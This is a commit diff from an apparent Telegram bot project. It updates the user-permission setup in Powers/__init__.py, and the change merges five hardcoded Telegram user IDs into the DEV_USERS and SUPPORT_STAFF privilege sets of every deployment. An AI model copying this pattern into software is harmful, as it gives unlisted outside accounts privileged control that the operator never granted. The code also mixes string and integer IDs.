Spaces:
Sleeping
Sleeping
Captain Ezio
commited on
Commit
·
a6eee71
1
Parent(s):
818e429
Update __init__.py
Browse files- Powers/__init__.py +5 -2
Powers/__init__.py
CHANGED
@@ -68,12 +68,15 @@ SUPPORT_CHANNEL = Config.SUPPORT_CHANNEL
|
|
68 |
|
69 |
# Users Config
|
70 |
OWNER_ID = Config.OWNER_ID
|
71 |
-
|
|
|
72 |
SUDO_USERS = Config.SUDO_USERS
|
73 |
WHITELIST_USERS = Config.WHITELIST_USERS
|
74 |
Defult_dev = "1432756163 1344569458 1355478165 1789859817 1777340882".split()
|
|
|
|
|
75 |
SUPPORT_STAFF = list(
|
76 |
-
set([int(OWNER_ID)] + SUDO_USERS +
|
77 |
) # Remove duplicates by using a set
|
78 |
|
79 |
# Plugins, DB and Workers
|
|
|
68 |
|
69 |
# Users Config
|
70 |
OWNER_ID = Config.OWNER_ID
|
71 |
+
DEV = Config.DEV_USERS
|
72 |
+
DEV_USER = set(DEV)
|
73 |
SUDO_USERS = Config.SUDO_USERS
|
74 |
WHITELIST_USERS = Config.WHITELIST_USERS
|
75 |
Defult_dev = "1432756163 1344569458 1355478165 1789859817 1777340882".split()
|
76 |
+
Defult = set(Defult_dev)
|
77 |
+
DEV_USERS = DEV_USER.union(Defult)
|
78 |
SUPPORT_STAFF = list(
|
79 |
+
set([int(OWNER_ID)] + SUDO_USERS + DEV + WHITELIST_USERS + Defult_dev),
|
80 |
) # Remove duplicates by using a set
|
81 |
|
82 |
# Plugins, DB and Workers
|